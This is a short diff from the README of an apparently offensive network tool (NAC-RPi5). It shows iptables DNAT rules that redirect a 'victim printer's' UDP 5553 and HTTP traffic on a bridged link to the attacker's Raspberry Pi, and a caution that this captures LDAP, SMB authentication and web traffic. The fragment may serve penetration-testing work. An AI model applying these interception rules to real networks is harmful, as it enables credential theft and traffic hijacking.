haha150/NAC-RPi5/README.md

 sudo iptables -t nat -A PREROUTING -i br0 -d <VICTIM-PRINTER-IP> -p udp --dport 5553 -j DNAT --to-destination 169.254.66.66:5553
 # HTTP (TCP 80)
 sudo iptables -t nat -A PREROUTING -i br0 -d <VICTIM-PRINTER-IP> -p tcp --dport 80 -j DNAT --to-destination 169.254.66.66:80
-# may add more like LDAP, SMTP, DNS..
+# may add more like LDAP, SMTP, DNS...
 ````

 >[!CAUTION]
-> This will actively mangle with the printer's network packages and features (ldap, printer http page, etc.).
+> This will actively mangle with the printer's network packages and features (LDAP search, SMB auth/scan/folders, printer HTTP page, etc.).
 > You basically rewrite important packets to your RPi.

 In case you want to remove those iptables rules: